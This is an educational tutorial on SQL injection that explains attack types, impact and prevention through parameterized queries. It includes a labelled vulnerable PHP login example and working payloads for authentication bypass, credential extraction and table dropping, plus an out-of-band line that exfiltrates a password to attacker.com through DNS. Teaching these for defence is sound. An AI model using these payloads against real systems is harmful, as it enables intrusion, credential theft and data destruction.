SQL Injection

Why It Matters

SQL injection has consistently ranked among the most critical web application vulnerabilities for over two decades. Despite being well-understood and preventable, SQLi continues to plague applications, enabling data breaches that expose millions of records.

The impact of SQL injection extends far beyond simple data access. Successful attacks can:

• Extract entire databases including passwords and personal information
• Modify or delete data, causing operational disruption
• Bypass authentication and impersonate users
• Execute commands on the underlying server
• Pivot to attack internal network systems

Some of the largest data breaches in history resulted from SQL injection, including incidents affecting major retailers, government agencies, and technology companies. The continued prevalence of this vulnerability reflects both legacy code issues and ongoing failures in secure development practices.

For security professionals, SQL injection serves as a fundamental skill area. Penetration testers must identify and exploit these vulnerabilities; developers must write secure code; and security engineers must implement defensive controls that catch what development misses.

How SQL Injection Works

SQL injection occurs when user input is incorporated into database queries without proper validation or sanitization:

Vulnerable Code Example

// VULNERABLE CODE - Never do this!
$username = $_POST['username'];
$password = $_POST['password'];

$query = "SELECT * FROM users
        WHERE username = '$username'
        AND password = '$password'";

$result = mysqli_query($connection, $query);

Attack Execution

Normal input:
username: admin
password: password123

Query becomes:
SELECT * FROM users WHERE username = 'admin' AND password = 'password123'

Malicious input:
username: admin' --
password: anything

Query becomes:
SELECT * FROM users WHERE username = 'admin' --' AND password = 'anything'

The -- comments out the password check, granting access!

Types of SQL Injection

In-Band SQLi

Results are returned directly in the application response.

Union-based: Combines attacker query results with legitimate query output.

-- Original query: SELECT name, price FROM products WHERE id = '1'

-- Injection: 1' UNION SELECT username, password FROM users --
-- Combined query extracts user credentials alongside product data

Error-based: Extracts data through database error messages.

-- Force errors that reveal information
1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT password FROM users LIMIT 1))) --

Blind SQLi

No direct output visible; attackers infer results through application behavior.

Boolean-based: Different responses based on true/false conditions.

-- If first character of password is 'a', page loads normally
1' AND SUBSTRING((SELECT password FROM users WHERE id=1),1,1)='a' --

-- Iterate through characters to extract data

Time-based: Uses database delays to extract information.

-- If condition is true, response delays 5 seconds
1' AND IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --

Out-of-Band SQLi

Data exfiltrated through external channels (DNS, HTTP requests).

-- Exfiltrate data via DNS lookup
1'; SELECT LOAD_FILE(CONCAT('\\', (SELECT password FROM users LIMIT 1), '.attacker.com\a')) --

SQL Injection Impact

Data Exfiltration

• Extract user credentials, personal information, financial data
• Dump entire database contents
• Access data across multiple tables and databases

Authentication Bypass

-- Classic bypass: always-true condition
' OR '1'='1' --
' OR 1=1 --
admin' --

Data Manipulation

• Modify account balances or permissions
• Delete records or drop tables
• Insert malicious data

System Compromise

• Execute operating system commands (via xp_cmdshell, etc.)
• Read/write files on the server
• Pivot to internal network

Prevention Techniques

Parameterized Queries (Prepared Statements)

The primary defense—separates SQL code from user data.

# SECURE - Using parameterized query
cursor.execute(
  "SELECT * FROM users WHERE username = %s AND password = %s",
  (username, password)
)

// SECURE - Using PreparedStatement
String query = "SELECT * FROM users WHERE username = ? AND password = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, username);
stmt.setString(2, password);
ResultSet rs = stmt.executeQuery();

Input Validation

• Validate data types (expect integer, reject strings)
• Whitelist allowed characters
• Reject known malicious patterns
• Validate length constraints

Stored Procedures

-- SECURE when properly implemented
CREATE PROCEDURE AuthenticateUser
  @Username NVARCHAR(50),
  @Password NVARCHAR(50)
AS
BEGIN
  SELECT * FROM Users
  WHERE Username = @Username AND Password = @Password
END

Defense in Depth

• Web Application Firewall (WAF) to detect attack patterns
• Principle of least privilege for database accounts
• Disable unnecessary database features
• Encrypt sensitive data at rest
• Regular security testing and code review

Defense Layer Stack:
1. Input validation at application boundary
2. Parameterized queries for all database interactions
3. Least privilege database accounts
4. WAF rules for SQLi patterns
5. Database activity monitoring
6. Regular penetration testing

Testing for SQL Injection

Manual Testing

Basic test payloads:
'
"
1' OR '1'='1
1' AND '1'='2
1; DROP TABLE users --
' UNION SELECT NULL --

Automated Tools

• SQLMap: Automated SQL injection detection and exploitation
• Burp Suite: Web application security testing platform
• OWASP ZAP: Open-source web scanner

Career Connection

SQL injection expertise is valuable across security roles. Web application penetration testers regularly test for and exploit SQLi; secure code reviewers identify vulnerable patterns; and application security engineers implement prevention controls.